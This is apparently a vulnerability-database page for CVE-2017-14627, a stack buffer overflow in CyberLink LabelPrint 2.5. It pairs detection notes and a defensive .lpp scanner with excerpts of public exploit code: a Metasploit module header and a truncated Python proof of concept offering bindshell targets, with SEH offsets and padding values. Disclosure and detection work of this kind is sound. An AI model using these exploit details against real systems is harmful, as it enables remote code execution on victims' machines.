CVE-2017-14627
Published 2017-09-23
Priority: P3 · 52 · high · 7.8 (CVSS 3.0)
CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
Exploit: public (see the Exploit-DB and Metasploit entries below)
EPSS: 19.19% (97.0th percentile)
Stack-based buffer overflows in CyberLink LabelPrint 2.5 allow remote attackers to execute arbitrary code via the (1) author (inside the INFORMATION tag), (2) name (inside the INFORMATION tag), (3) artist (inside the TRACK tag), or (4) default (inside the TEXT tag) parameter in an lpp project file.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| cyberlink | labelprint | — | — |
Detection & IOCs (extracted from sources)
- The exploit's junk byte is always one of 'A', 'B' or 'C', picked at random from that fixed set; the restriction is a constraint of the unicode encoding chain, not an arbitrary choice.
- The Metasploit module sets DisablePayloadHandler to true by default, so the operator has to run a handler separately; detections that rely solely on Metasploit handler traffic may miss this.
- The SEH overwrite offset is fixed at 790 bytes across all three target OS variants (Win7/8.1/10 x64); only the padding values differ per target (Padding1: 857/845/781, Padding2: 104/116/180).
- The exploit uses the x86/unicode_mixed encoder with EAX as the buffer register and a payload space of up to 15,000 bytes; signatures must match unicode-encoded shellcode, not the raw payload.
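As an added example (not code from the page's sources or from the exploit authors), the following Python triage scanner turns the description and the notes above into a check that can be run over .lpp project files: it flags the four sinks named in the CVE (author and name on INFORMATION, artist on TRACK, default on TEXT) when a value is implausibly long, and separately flags the long 'A'/'B'/'C' filler runs the public unicode SEH exploits use. The page does not show the real project schema, so the treatment of the fields as XML attributes, the element nesting in the constructed samples, and the 256-character threshold are all assumptions; the checks walk the whole tree so they do not depend on the nesting.

```python
"""Triage scanner for CyberLink LabelPrint .lpp project files.

Added example, not code from the page's sources.  It flags the four sinks
named in CVE-2017-14627 (author and name on INFORMATION, artist on TRACK,
default on TEXT) when a value is implausibly long, and separately flags the
long 'A'/'B'/'C' filler runs that the public unicode SEH exploits use.
Assumptions: the fields are XML attributes and the sample's element nesting
is made up; the checks walk the whole tree so they do not depend on either.
"""
import re
import xml.etree.ElementTree as ET

# (tag, attribute) pairs named in the CVE description.
SINKS = {
    ("INFORMATION", "author"),
    ("INFORMATION", "name"),
    ("TRACK", "artist"),
    ("TEXT", "default"),
}

# Threshold is an assumption: a label author or track artist of several
# hundred characters is already abnormal, and the public module needs 790
# bytes just to reach the SEH record.
MAX_FIELD_LEN = 256

# Unicode (venetian) SEH payloads are filler plus alphanumeric-encoded
# shellcode; the filler byte is one of 'A', 'B', 'C'.  64 identical bytes in
# a row do not occur in a genuine label project.
FILLER_RUN = re.compile(r"([ABC])\1{63,}")


def decode_lpp(data: bytes) -> str:
    """Decode raw project bytes, honouring a UTF-16 BOM if one is present.

    The overflow is a unicode one because the application widens the field
    to UTF-16 in memory; on disk the file may or may not already be UTF-16.
    """
    if data.startswith((b"\xff\xfe", b"\xfe\xff")):
        return data.decode("utf-16")
    return data.decode("utf-8", errors="replace")


def scan_lpp(data: bytes) -> list:
    """Return (reason, tag, attribute, detail) findings for one .lpp file.

    Caveat: ElementTree is not hardened against hostile XML (entity
    expansion); sandbox this or substitute defusedxml for bulk triage.
    """
    text = decode_lpp(data)
    # Drop the XML declaration so a declared encoding cannot conflict with
    # the str we already decoded.
    text = re.sub(r"^\s*<\?xml[^>]*\?>", "", text)
    try:
        root = ET.fromstring(text)
    except ET.ParseError as exc:
        # Not well-formed is itself a signal: the PoC writes raw opcode
        # bytes (e.g. \x05) that are illegal in XML.
        return [("parse-error", None, None, str(exc))]
    findings = []
    for elem in root.iter():
        for attr, value in elem.attrib.items():
            if (elem.tag, attr) in SINKS and len(value) > MAX_FIELD_LEN:
                findings.append(("oversized-field", elem.tag, attr, len(value)))
            if FILLER_RUN.search(value):
                findings.append(("seh-filler-run", elem.tag, attr, len(value)))
    return findings


def constructed_samples() -> tuple:
    """Constructed inputs for a stand-alone run: a benign project and one
    whose INFORMATION author carries 790 bytes of 'B' filler (the SEH offset
    reported for the Metasploit module).  Nesting is an assumption."""
    benign = (
        b'<?xml version="1.0"?>\n'
        b"<PROJECT>\n"
        b'\t<INFORMATION author="alice" name="Holiday mix">\n'
        b'\t\t<TRACK artist="Some Band"/>\n'
        b'\t\t<TEXT default="Side A"/>\n'
        b"\t</INFORMATION>\n"
        b"</PROJECT>\n"
    )
    crafted = (
        b'<?xml version="1.0"?>\n'
        b"<PROJECT>\n"
        b'\t<INFORMATION author="' + b"B" * 790 + b'" name="test">\n'
        b"\t</INFORMATION>\n"
        b"</PROJECT>\n"
    )
    return benign, crafted


if __name__ == "__main__":
    for label, sample in zip(("benign", "crafted"), constructed_samples()):
        print(label, scan_lpp(sample))
```

The two checks are deliberately independent: the length check catches any oversized value in a named sink regardless of how it was built, while the filler-run check catches the public exploit chain even in a field the scanner does not know about. A file that fails to parse is returned as a finding rather than skipped, since the public PoC emits raw opcode bytes that are not legal XML.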
CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| NVD | 3.0 | 7.8 | HIGH | CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H |
| NVD | 2.0 | 6.8 | MEDIUM | AV:N/AC:M/Au:N/C:P/I:P/A:P |

The two vectors disagree on attack vector. The v3.0 scoring is local with user interaction required (AV:L/UI:R): a victim has to open a crafted .lpp project file, which is what the description's "remote attackers" amounts to. The v2.0 vector's AV:N reflects the older convention of treating a file delivered over the network as network-reachable.
No detection rules found.
Exploit-DB
CyberLink LabelPrint 2.5 - Stack Buffer Overflow (Metasploit)
exploitdb · 2018-12-13 · CVE-2017-14627
---
```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

  # File-format exploit (crafted .lpp project) that overwrites an SEH record.
  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::Remote::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'CyberLink LabelPrint 2.5 Stack Buffer Overflow',
      'Description'    => %q{
        This module exploits a stack buffer overflow in CyberLink LabelPrint 2.5 and below.
        The vulnerability is triggered when opening a .lpp project file containing overly long string characters
        via open file menu. This results in overwriting a structured exception handler record and takes over the
        application. This module has been tested on Windows 7 (64 bit), Windows 8.1 (64 bit), and Windows 10 (64 bit).
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'modpr0be', # initial discovery and metasploit module
```
Exploit-DB
CyberLink LabelPrint < 2.5 - Local Buffer Overflow (SEH Unicode)
exploitdb · 2017-09-23 · CVSS 7.8 · CVE-2017-14627 [HIGH]

```python
# closing tags appended to the overflow buffer, then the project file is written
bug += ("\x09\x3c\x2f\x49\x4e\x46\x4f\x52\x4d\x41\x54\x49\x4f\x4e\x3e\x0a"  # "\t</INFORMATION>\n"
        "\x3c\x2f\x50\x52\x4f\x4a\x45\x43\x54\x3e")                           # "</PROJECT>"
f.write(header + "\n" + bug)
print "[+] File", filename2, "successfully created!"
print "[*] Now open project file", filename2, "with CyberLink LabelPrint."
print "[*] Good luck ;)"
f.close()

# banner and target menu (Python 2: input() evaluates what is typed, so the
# comparisons below are against integers)
print "[*] "
print "[*] by f3ci & modpr0be "
print "[*] \n"
print "\t1.Windows 7 x86 bindshell on port 4444"
print "\t2.Windows 8.1 x64 bindshell on port 4444"
print "\t3.Windows 10 x64 bindshell on port 4444\n"
input = input("Choose Target OS : ")
try:
    if input == 1:
        align = "\x05\x09\x01"   # add eax,01000400
        align2 = "\x05\x0A\x01"  # add eax, 01000900
        junk1 = '\x42' * 68      # junk for win7x86
        junk2 = '\x42' * 893     # junk for win7x86
        exp()
    elif input == 2:
        align = "\x0
```
Metasploit
CyberLink LabelPrint 2.5 Stack Buffer Overflow
This module exploits a stack buffer overflow in CyberLink LabelPrint 2.5 and below. The vulnerability is triggered when opening a .lpp project file containing overly long string characters via open file menu. This results in overwriting a structured exception handler record and takes over the application. This module has been tested on Windows 7 (64 bit), Windows 8.1 (64 bit), and Windows 10 (64 bit).
No writeups or analysis indexed.
References
- https://blog.spentera.com/2017/09/19/unicode-stack-based-buffer-overflow-on-cyberlink-labelprint-2-5/
- https://www.exploit-db.com/exploits/42777/
- https://www.exploit-db.com/exploits/45985/